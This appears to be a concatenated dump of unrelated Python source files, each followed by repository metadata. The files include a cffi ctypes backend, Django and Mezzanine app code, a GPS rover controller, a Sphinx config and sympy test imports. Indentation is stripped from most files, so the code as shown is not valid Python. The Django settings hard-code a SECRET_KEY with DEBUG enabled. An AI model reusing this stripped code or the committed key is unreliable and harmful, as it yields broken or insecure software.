else:
assert len(args) == len(BArgs)
ctypes_args = []
for arg, BArg in zip(args, BArgs):
ctypes_args.append(BArg._arg_to_ctypes(arg))
if has_varargs:
for i, arg in enumerate(extraargs):
if arg is None:
ctypes_args.append(ctypes.c_void_p(0)) # NULL
continue
if not isinstance(arg, CTypesData):
raise TypeError(
"argument %d passed in the variadic part "
"needs to be a cdata object (got %s)" %
(1 + len(BArgs) + i, type(arg).__name__))
ctypes_args.append(arg._arg_to_ctypes(arg))
result = self._as_ctype_ptr(*ctypes_args)
return BResult._from_ctypes(result)
#
CTypesFunctionPtr._fix_class()
return CTypesFunctionPtr
def new_enum_type(self, name, enumerators, enumvalues, CTypesInt):
assert isinstance(name, str)
reverse_mapping = dict(zip(reversed(enumvalues),
reversed(enumerators)))
#
class CTypesEnum(CTypesInt):
__slots__ = []
_reftypename = '%s &' % name
def _get_own_repr(self):
value = self._value
try:
return '%d: %s' % (value, reverse_mapping[value])
except KeyError:
return str(value)
def _to_string(self, maxlen):
value = self._value
try:
return reverse_mapping[value]
except KeyError:
return str(value)
#
CTypesEnum._fix_class()
return CTypesEnum
def get_errno(self):
return ctypes.get_errno()
def set_errno(self, value):
ctypes.set_errno(value)
def string(self, b, maxlen=-1):
return b._to_string(maxlen)
def buffer(self, bptr, size=-1):
raise NotImplementedError("buffer() with ctypes backend")
def sizeof(self, cdata_or_BType):
if isinstance(cdata_or_BType, CTypesData):
return cdata_or_BType._get_size_of_instance()
else:
assert issubclass(cdata_or_BType, CTypesData)
return cdata_or_BType._get_size()
def alignof(self, BType):
assert issubclass(BType, CTypesData)
return BType._alignment()
def newp(self, BType, source):
if not issubclass(BType, CTypesData):
raise TypeError
return BType._newp(source)
def cast(self, BType, source):
return BType._cast_from(source)
def callback(self, BType, source, error, onerror):
assert onerror is None # XXX not implemented
return BType(source, error)
_weakref_cache_ref = None
def gcp(self, cdata, destructor, size=0):
if self._weakref_cache_ref is None:
import weakref
class MyRef(weakref.ref):
def __eq__(self, other):
myref = self()
return self is other or (
myref is not None and myref is other())
def __ne__(self, other):
return not (self == other)
def __hash__(self):
try:
return self._hash
except AttributeError:
self._hash = hash(self())
return self._hash
self._weakref_cache_ref = {}, MyRef
weak_cache, MyRef = self._weakref_cache_ref
if destructor is None:
try:
del weak_cache[MyRef(cdata)]
except KeyError:
raise TypeError("Can remove destructor only on a object "
"previously returned by ffi.gc()")
return None
def remove(k):
cdata, destructor = weak_cache.pop(k, (None, None))
if destructor is not None:
destructor(cdata)
new_cdata = self.cast(self.typeof(cdata), cdata)
assert new_cdata is not cdata
weak_cache[MyRef(new_cdata, remove)] = (cdata, destructor)
return new_cdata
typeof = type
def getcname(self, BType, replace_with):
return BType._get_c_name(replace_with)
def typeoffsetof(self, BType, fieldname, num=0):
if isinstance(fieldname, str):
if num == 0 and issubclass(BType, CTypesGenericPtr):
BType = BType._BItem
if not issubclass(BType, CTypesBaseStructOrUnion):
raise TypeError("expected a struct or union ctype")
BField = BType._bfield_types[fieldname]
if BField is Ellipsis:
raise TypeError("not supported for bitfields")
return (BField, BType._offsetof(fieldname))
elif isinstance(fieldname, (int, long)):
if issubclass(BType, CTypesGenericArray):
BType = BType._CTPtr
if not issubclass(BType, CTypesGenericPtr):
raise TypeError("expected an array or ptr ctype")
BItem = BType._BItem
offset = BItem._get_size() * fieldname
if offset > sys.maxsize:
raise OverflowError
return (BItem, offset)
else:
raise TypeError(type(fieldname))
def rawaddressof(self, BTypePtr, cdata, offset=None):
if isinstance(cdata, CTypesBaseStructOrUnion):
ptr = ctypes.pointer(type(cdata)._to_ctypes(cdata))
elif isinstance(cdata, CTypesGenericPtr):
if offset is None or not issubclass(type(cdata)._BItem,
CTypesBaseStructOrUnion):
raise TypeError("unexpected cdata type")
ptr = type(cdata)._to_ctypes(cdata)
elif isinstance(cdata, CTypesGenericArray):
ptr = type(cdata)._to_ctypes(cdata)
else:
raise TypeError("expected a <cdata 'struct-or-union'>")
if offset:
ptr = ctypes.cast(
ctypes.c_void_p(
ctypes.cast(ptr, ctypes.c_void_p).value + offset),
type(ptr))
return BTypePtr._from_ctypes(ptr)
class CTypesLibrary(object):
def __init__(self, backend, cdll):
self.backend = backend
self.cdll = cdll
def load_function(self, BType, name):
c_func = getattr(self.cdll, name)
funcobj = BType._from_ctypes(c_func)
funcobj._name = name
return funcobj
def read_variable(self, BType, name):
try:
ctypes_obj = BType._ctype.in_dll(self.cdll, name)
except AttributeError as e:
raise NotImplementedError(e)
return BType._from_ctypes(ctypes_obj)
def write_variable(self, BType, name, value):
new_ctypes_obj = BType._to_ctypes(value)
ctypes_obj = BType._ctype.in_dll(self.cdll, name)
ctypes.memmove(ctypes.addressof(ctypes_obj),
ctypes.addressof(new_ctypes_obj),
ctypes.sizeof(BType._ctype))
|
Widiot/simpleblog
|
venv/lib/python3.5/site-packages/cffi/backend_ctypes.py
|
Python
|
mit
| 42,086 | 0.001022 |
from __future__ import unicode_literals
from django.contrib import admin
from django.core import urlresolvers
from mezzanine.core.admin import TabularDynamicInlineAdmin, StackedDynamicInlineAdmin
from .models import Slider, SlideCaption, Slide
class SlideInline(TabularDynamicInlineAdmin):
template = "slider_revolution/admin/slide_dynamic_inline_tabular.html"
model = Slide
extra = 1
def changeform_link(self, instance):
if instance.id:
changeform_url = urlresolvers.reverse('admin:slider_revolution_slide_change', args=(instance.id,))
return '<a href="{}">Details</a>'.format(changeform_url)
else:
addform_url = urlresolvers.reverse('admin:slider_revolution_slide_add')
return '<a href="{}">Add</a>'.format(addform_url)
return u''
changeform_link.allow_tags = True
changeform_link.short_description = 'Slide'
fields = ("image_thumb", "changeform_link")
readonly_fields = ("image_thumb", "changeform_link",)
class SliderAdmin(admin.ModelAdmin):
inlines = (SlideInline,)
class SlideCaptionInline(StackedDynamicInlineAdmin):
model = SlideCaption
class SlideAdmin(admin.ModelAdmin):
inlines = (SlideCaptionInline,)
admin.site.register(Slider, SliderAdmin)
admin.site.register(Slide, SlideAdmin)
|
restless/mezzanine-slider-revolution
|
slider_revolution/admin.py
|
Python
|
mit
| 1,323 | 0.002268 |
"""
Django settings for ltc_huobi project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import ltc
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6t$e^bg18g6u)((0gvfb(dnfh5y&=0_lz&5*-6hrs=mc&u1j#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = [
'ltc.apps.LtcConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ltc_huobi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ltc_huobi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
|
yiplee/ltc-huobi
|
ltc_huobi/settings.py
|
Python
|
mit
| 3,262 | 0.001226 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import render_template
from app.extensions import celery, mail
from app.data import db
from celery.signals import task_postrun
from flask_mail import Message
@celery.task
def send_registration_email(user, token):
msg = Message(
'User Registration',
sender='admin@flask-bones.com',
recipients=[user.email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
# Flask SQLAlchemy will automatically create new sessions for you from
# a scoped session factory, given that we are maintaining the same app
# context, this ensures tasks have a fresh session (e.g. session errors
# won't propagate across tasks)
db.session.remove()
|
Urumasi/Flask-Bones
|
app/tasks.py
|
Python
|
mit
| 874 | 0 |
from implementation import *
from implementations import *
|
drvinceknight/sklDj
|
sklDj/implementations/__init__.py
|
Python
|
mit
| 59 | 0 |
import sys
import argparse
import time
sys.path.append('./bin/moabc')
import optimizer
#引数の処理
#parserの初期化
parser = argparse.ArgumentParser(description='This script optimizes bayesian network graph structure by MOABC')
#強化成功率表
parser.add_argument("infile_pt", type=str)
#一回の強化費用
parser.add_argument("-pg","--pricegrind", type=int)
#強化シミュレータの実行回数
parser.add_argument("-na","--num_average", type=int, default=100)
#結果の出力先
# 最後のスラッシュいらない
# OK: test, ./test
# NG: test/, ./test/
parser.add_argument("out_dir", type=str)
#学習中の結果の保存
group_sp = parser.add_mutually_exclusive_group()
group_sp.add_argument('-sp', '--saveprogress', action='store_true')
group_sp.add_argument('-n-sp', '--no-saveprogress', action='store_false')
parser.set_defaults(saveprogress=False)
#並列化のプロセス数
parser.add_argument("-np","--num_proc", type=int, default=1)
#画像出力の有無
# sshログインとかだと無理なので、Falseを入れる
group_wi = parser.add_mutually_exclusive_group()
group_wi.add_argument('-wi', '--withimage', action='store_true')
group_wi.add_argument('-n-wi', '--no-with_image', action='store_false')
parser.set_defaults(withimage=True)
#蜂の数
parser.add_argument('-me', '--m_employed', type=int, help='収穫蜂の数', default=40)
parser.add_argument('-mo', '--m_onlooker',type=int, help='追従蜂の数', default=40)
parser.add_argument('-li', '--limit',type=int, help='偵察蜂の閾値', default=3)
#ループ数
parser.add_argument('-n', type=int, help='ループ数', default=50)
#ALPHA
parser.add_argument('-a', '--alpha', type=float, help='ALPHAの値', default=1)
#変数のparse
# 下のやり方でdictになるっぽい
args = vars(parser.parse_args())
print("parsed argments from argparse\n%s\n" % str(args))
#出力先ディレクトリ
out_dir = args['out_dir']
#実行中の結果保存
save_progress = args['saveprogress']
#インスタンスの作成
infile_pt = args['infile_pt']
input_price_grind = args['pricegrind']
op = optimizer.MOABC(infile_pt, input_price_grind)
#ハイパーパラメータの設定
op.M_employed = args['m_employed']
op.M_onlooker = args['m_onlooker']
op.LIMIT = args['limit']
op.N = args['n']
op.weight_h = args['alpha']
op.proc = args['num_proc']
op.num_average = args['num_average']
#パラメータを適用
op.gen.calculate_weights()
#学習の処理
dir_save_progress = ''
if save_progress:
dir_save_progress = out_dir
start = time.time()
op.learn(out_dirname=dir_save_progress)
end = time.time()
#経過時間の出力
str_time = "time: ", "{0}".format(end - start)
print(str_time)
f = open('%s/time.log' % out_dir, 'w')
f.writelines(str_time)
f.close()
#学習結果の出力
op.save_result(out_dir, prefix='total', with_image=args['withimage'])
|
curiburn/pso2_grind_optimizer
|
py/main.py
|
Python
|
gpl-3.0
| 2,887 | 0.011304 |
#!/usr/bin/python
import serial
import RPi.GPIO as GPIO
import time
import math
from RPIO import PWM
import logging
from math import *
from hmc5883l import hmc5883l
import sys
import os
# -----------------------------------------
# ----- begin declare variables
# -----------------------------------------
# log filename
logfile = 'log.csv'
# waypoint filename
wpfile = "waypoints.txt"
# GPS serial port
serialport = serial.Serial("/dev/gps0", 115200)
# xbee serial port
#xbee = serial.Serial("/dev/gps0", 9600)
# compass adjustment
cAdjust = +2
# GPIO pins
goButton = 17
readyLED = 18
steering = 24
#throttle = 23
# GPS accuracy * 2
GPSaccuracy = 10
# -----------------------------------------
# ----- end declare variables
# -----------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setup(readyLED,GPIO.OUT)
GPIO.setup(goButton,GPIO.IN)
# setup compass
#mydec = -13,25
compass = hmc5883l(gauss = 4.7, declination = (-7,13))
# read in waypoints
wps = []
wplist = open(wpfile,'r')
for line in wplist:
coord = line.split(",")
wps.append([float(coord[0]),float(coord[1])])
wplist.close()
# open logfile
f = open(logfile,'a')
# init steering / throttle
servo = PWM.Servo(pulse_incr_us=1)
servo.set_servo(steering,1500)
#servo.set_servo(throttle,1500)
def blinkLED(n):
# blink LED on/off n number of times
# LED is on/off for 0.5/0.2 seconds
i = 0
while i <= n:
GPIO.output(readyLED,1)
time.sleep(0.5)
GPIO.output(readyLED,0)
time.sleep(0.2)
i += 1
def getDegrees(dms,nw):
# convert GPS in dddmm.mmmm format to dd.dddd
if (int(dms[0:1]) != 0):
dms = str(0) + dms
D = int(dms[0:3])
M = float(dms[3:])
#S = float(dms[5:])
DD = D + float(M)/60 #+ float(S)/3600
if (nw == "S" or nw == "W"): DD *= -1
return float(DD)
def getLocation():
# read serial port and parse out GPS lat/long/compass/heading info
# return a list of found values
GPS = [0, 1, 2, 3, 4]
GPSFound = 0
while not GPSFound:
NMEAline = serialport.readline()
NMEAdata = NMEAline.split(',')
if (NMEAdata[0] == "$GPRMC"):
# make sure we have GPS lock
if NMEAdata[2] == "V": continue
GPS[0] = round(getDegrees(NMEAdata[3],NMEAdata[4]),6) # lat
GPS[1] = NMEAdata[4] # n/s
GPS[2] = round(getDegrees(NMEAdata[5],NMEAdata[6]),6) # long
GPS[3] = NMEAdata[6] # e/w
GPS[4] = NMEAdata[8] # heading
GPSFound = 1
return GPS
def getBearing(lat1, long1, lat2, long2):
long1, lat1, long2, lat2 = map(radians, [long1, lat1, long2, lat2])
dLon = long2 - long1
y = sin(dLon) * cos(lat2)
x = cos(lat1) * sin(lat2) \
- sin(lat1) * cos(lat2) * cos(dLon)
b = round(degrees(atan2(y, x)))
b = b + 360 if b < 0 else b
return b
def getDistance(lat1, long1, lat2, long2):
lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])
dlon = long2 - long1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
d = 3961 * c
d = round(d * 5280,6) # convert distance to feet
print ('Distance: ' + str(d))
return d
def changeDirection(course):
# change rc steering to match course angle
steerAng = (round(course / 3.5) * 50) + 1500
servo.set_servo(steering,steerAng)
def main():
GPIO.output(readyLED,1)
while True:
if (GPIO.input(goButton)):
# get ready
blinkLED(3)
# go
#servo.set_servo(throttle,1600)
# time of run
tor = str(time.strftime("%d%m%Y")) + str(time.strftime("%H%M%S"))
# set loop count
n = 0
for wp in wps:
wpLat = wp[0]
wpLong = wp[1]
distance = GPSaccuracy
while distance >= GPSaccuracy:
start = int(round(time.time() * 1000))
GPS = getLocation()
myLat = GPS[0]
myLong = GPS[2]
bearing = getBearing(myLat,myLong,wpLat,wpLong)
heading = compass.heading() + cAdjust
course = bearing - heading
while course > 0:
if (course >= 180):
course -= 360
if (course <= -180):
course +=360
# correct for max turn capability
if (course > 35):
course = 35
if (course < -35):
course = -35
changeDirection(course)
heading = compass.heading() + cAdjust
course = bearing - heading
# -----------------------
# ---- output to log
# -----------------------
end = int(round(time.time() * 1000))
lduration = (end - start)
# -----------------------
# --- output to xbee
# -----------------------
output = str(n) + ' || ' + str(myLat) + ' || ' + str(myLong) + ' || ' + \
str(wp) + ' || ' + str(bearing) + ' || ' + str(distance) + ' || ' + \
str(heading) + ' || ' + str(course) + ' || ' + str(lduration) + '\r'
#xbee.write(output)
# ---- header
# tor,loop,lat,long,waypoint,bearing,distance,heading,course,loop duration
output = str(tor), str(n) + ',' + str(myLat) + ',' + str(myLong) + ',' + \
str(wp) + ',' + str(bearing) + ',' + str(distance) + ',' + \
str(heading) + ',' + str(course) + ',' + str(lduration) + '\n'
f.write(output)
n += 1
distance = getDistance(myLat,myLong,wpLat,wpLong)
f.close()
# stop
#servo.set_servo(throttle,1500)
if __name__=="__main__":
main()
|
klinstifen/rpi.mar13
|
mar13.py
|
Python
|
lgpl-3.0
| 6,451 | 0.014106 |
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
# can be used to compare documents. The word count in a document is normalized
# between 0.0-1.0 so that shorted documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".
s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""
# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print
# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):
#import os, codecs
#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
# "badger", "bear", "dog", "dolphin", "lion", "parakeet",
# "rabbit", "shark", "sparrow", "tiger", "wolf"):
# s = w.search(q, cached=True)
# s = s.plaintext()
# print os.path.join("corpus2", q+".txt")
# f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
# f.write(s)
# f.close()
# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print
# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print
# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
print feature, weight
# Document vectors can be bundled into a Model (next example).
|
krishna11888/ai
|
third_party/pattern/examples/05-vector/01-document.py
|
Python
|
gpl-2.0
| 3,205 | 0.007488 |
# -*- coding: utf-8 -*-
#
# Core documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 12:49:48 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.autohttp.flask'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Eliza'
copyright = u'2016, Jens Schaa'
author = u'Jens Schaa'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('../eliza'))
import version
version = '.'.join(str(x) for x in version.__version__)
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Coredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Eliza.tex', u'Eliza Documentation',
u'Jens Schaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Eliza', u'Eliza Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Eliza', u'Eliza Documentation',
author, 'Eliza', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
redvox/Eliza
|
docs/conf.py
|
Python
|
apache-2.0
| 9,460 | 0.006237 |
# Copyright (C) 2012 by Eka A. Kurniawan
# eka.a.kurniawan(ta)gmail(tod)com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Tested on:
# - Python 2.7.3
# - NumPy 1.6.2
# - MatPlotLib 1.1.1
import numpy as np
import matplotlib.pyplot as plot
files = [['H1N1 - Avian - protein_conservation.txt', 'H1N1 - Avian'],
['H1N1 - Human - protein 1a_conservation.txt', 'H1N1 - Human 1'],
['H1N1 - Human - protein 1b_conservation.txt', 'H1N1 - Human 2'],
['H1N1 - Human - protein 2a_conservation.txt', 'H1N1 - Human 3'],
['H1N1 - Human - protein 2b_conservation.txt', 'H1N1 - Human 4'],
['H1N1 - Human - protein 3a_conservation.txt', 'H1N1 - Human 5'],
['H1N1 - Human - protein 3b_conservation.txt', 'H1N1 - Human 6'],
['H1N1 - Swine - protein_conservation.txt', 'H1N1 - Swine'],
['H3N2 - Avian - protein_conservation.txt', 'H3N2 - Avian'],
['H3N2 - Human - protein 1_conservation.txt', 'H3N2 - Human 1'],
['H3N2 - Human - protein 2_conservation.txt', 'H3N2 - Human 2'],
['H3N2 - Human - protein 3_conservation.txt', 'H3N2 - Human 3'],
['H3N2 - Swine - protein_conservation.txt', 'H3N2 - Swine'],
['H5N1 - Avian - protein_conservation.txt', 'H5N1 - Avian'],
['H5N1 - Human - protein_conservation.txt', 'H5N1 - Human'],
['H5N1 - Swine - protein_conservation.txt', 'H5N1 - Swine']]
conservations = []
totalFile = len(files)
for file in files:
inFile = open(file[0], 'r')
conservations.append(np.array(inFile.read().split(',')[:-1], \
dtype = np.float))
inFile.close()
plot.boxplot([np.asarray(cs) for cs in conservations])
plot.title('Conservation Box Plot of Different Viruses')
plot.ylabel('Score (0 to 11)')
plot.xticks(np.arange(totalFile + 1), [''] + [file[1] for file in files], \
rotation = -90)
plot.show()
|
ekaakurniawan/Bioinformatics-Tools
|
plot_conservation/plot_conservation.py
|
Python
|
gpl-2.0
| 2,539 | 0.002363 |
from sympy import (Matrix, Symbol, solve, exp, log, cos, acos, Rational, Eq,
sqrt, oo, LambertW, pi, I, sin, asin, Function, diff, Derivative, symbols,
S, sympify, var, simplify, Integral, sstr, Wild, solve_linear, Interval,
And, Or, Lt, Gt, Assume, Q, re, im, expand, zoo)
from sympy.solvers import solve_linear_system, solve_linear_system_LU,dsolve,\
tsolve, solve_undetermined_coeffs
from sympy.solvers.solvers import guess_solve_strategy, GS_POLY, GS_POLY_CV_1, GS_POLY_CV_2,\
GS_TRANSCENDENTAL, GS_RATIONAL, GS_RATIONAL_CV_1
from sympy.utilities.pytest import XFAIL, raises
from sympy.abc import x
def NS(e, n=15, **options):
